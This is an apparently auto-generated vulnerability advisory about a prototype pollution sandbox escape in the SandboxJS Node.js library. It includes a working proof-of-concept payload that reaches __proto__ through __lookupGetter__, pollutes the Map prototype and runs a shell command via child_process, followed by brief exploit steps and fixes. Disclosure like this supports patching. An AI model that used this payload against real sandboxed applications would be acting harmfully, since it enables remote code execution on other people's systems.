Nodejs SandboxJS, Prototype Pollution Sandbox Escape, N/A (Critical)

Listen to this Post

SandboxJS implements prototype chain validation in `executor.ts` LispType.Prop operation (lines 368-398). It correctly restricts access to the root Object.prototype. However, when accessing a property on a function object (e.g., Object.toString.__lookupGetter__), the `prototypeAccess` check uses isFunction = true. The subsequent `isFunction` branch only validates against a prototype whitelist for a.prototype, failing to check if the accessed property itself (like __lookupGetter__) originates from a forbidden prototype up the function object’s own chain. This allows an attacker to retrieve the `__lookupGetter__` method, which is then used to access `__proto__` of other objects, bypassing sandbox restrictions to pollute prototypes and achieve Remote Code Execution.
Platform: SandboxJS
Version: < f212a38
Vulnerability : Prototype Pollution
Severity: Critical
date: N/A

Prediction: 2026-02-17

What Undercode Say:

npm list @nyariv/sandboxjs
// Proof of Concept
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
isFinite.constructor(
"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
)(),
);`
sb.compile(payload)().run();

How Exploit:

1. Access `__lookupGetter__` via function object.

2. Use it to obtain `__proto__` accessor.

3. Pollute `Map` prototype.

4. Execute arbitrary shell commands.

Protection from this CVE:

Update SandboxJS.

Disable `__lookupGetter__`.

Stricter function property checks.

Impact:

Critical RCE

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top